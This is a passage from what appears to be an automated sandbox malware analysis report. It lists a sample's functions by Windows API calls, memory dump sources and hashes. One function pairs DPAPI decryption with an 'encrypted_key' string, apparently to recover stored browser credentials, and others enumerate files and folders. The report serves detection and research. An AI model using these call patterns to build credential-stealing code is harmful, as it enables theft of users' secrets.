                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 7878afa374b362876325b3fc6f2c2f33a99ea9001b91823f77fabb435f03e76d
                          • Instruction ID: 2b373ee78b7ed1444383b0e6e7329234d32e8c7724c743598ec39aa76662acfb
                          • Opcode Fuzzy Hash: 7878afa374b362876325b3fc6f2c2f33a99ea9001b91823f77fabb435f03e76d
                          • Instruction Fuzzy Hash: 06311CB6D10209ABDF14DFE5DC85EEFB7B8FB48304F144529EA15A7241EB319A04CBA1
                          APIs
                          • CreateFileA.KERNEL32(00CC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00CC3AEE,?), ref: 00CC92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00CC3AEE), ref: 00CC9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00CC9327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: df8a27be4ecd8974212c5082fadd8a62f58777e3f47aceb26dfbf4a65d76192e
                          • Instruction ID: a41f0a5eea925a2fed447b0d6422c4ae6651246b64f0908b83b58365442a3f1c
                          • Opcode Fuzzy Hash: df8a27be4ecd8974212c5082fadd8a62f58777e3f47aceb26dfbf4a65d76192e
                          • Instruction Fuzzy Hash: DDF01975E40208ABDB10DBA2DC49FAE77B9EB88710F148668E655AB2D0D6B0A6058F40
                          APIs
                          • __getptd.LIBCMT ref: 00CCC74E
                            • Part of subcall function 00CCBF9F: __amsg_exit.LIBCMT ref: 00CCBFAF
                          • __getptd.LIBCMT ref: 00CCC765
                          • __amsg_exit.LIBCMT ref: 00CCC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00CCC797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: c992c6d20ed77966c031751b54ef796599eb02aea94ade1d32ab2dc0e8308452
                          • Instruction ID: c76c39d95bb442aba49d8ff04ef8f8ba348d7036d52f926b1b0e9f41293b7619
                          • Opcode Fuzzy Hash: c992c6d20ed77966c031751b54ef796599eb02aea94ade1d32ab2dc0e8308452
                          • Instruction Fuzzy Hash: 4DF09A32905204DBEB21BBF8D887F5E33A0AF00724F21414EF418AA2D2DB645E80AF56
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4F7A
                          • lstrcat.KERNEL32(?,00CD1070), ref: 00CC4F97
                          • lstrcat.KERNEL32(?,01899C20), ref: 00CC4FAB
                          • lstrcat.KERNEL32(?,00CD1074), ref: 00CC4FBD
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC492C
                            • Part of subcall function 00CC4910: FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                            • Part of subcall function 00CC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                            • Part of subcall function 00CC4910: FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 984218ee9dd756e992f0d0729b336673d2360758ced4315dc90e5f76303dea7c
                          • Instruction ID: 7a4614c457ec23111858aecace5cc12a9d91ad39e38292ff2b021639f0f99890
                          • Opcode Fuzzy Hash: 984218ee9dd756e992f0d0729b336673d2360758ced4315dc90e5f76303dea7c
                          • Instruction Fuzzy Hash: 1021B8B69002086BC754FBA0DC46FFA333CA794700F444568F65DA6181EE74AACCDBA2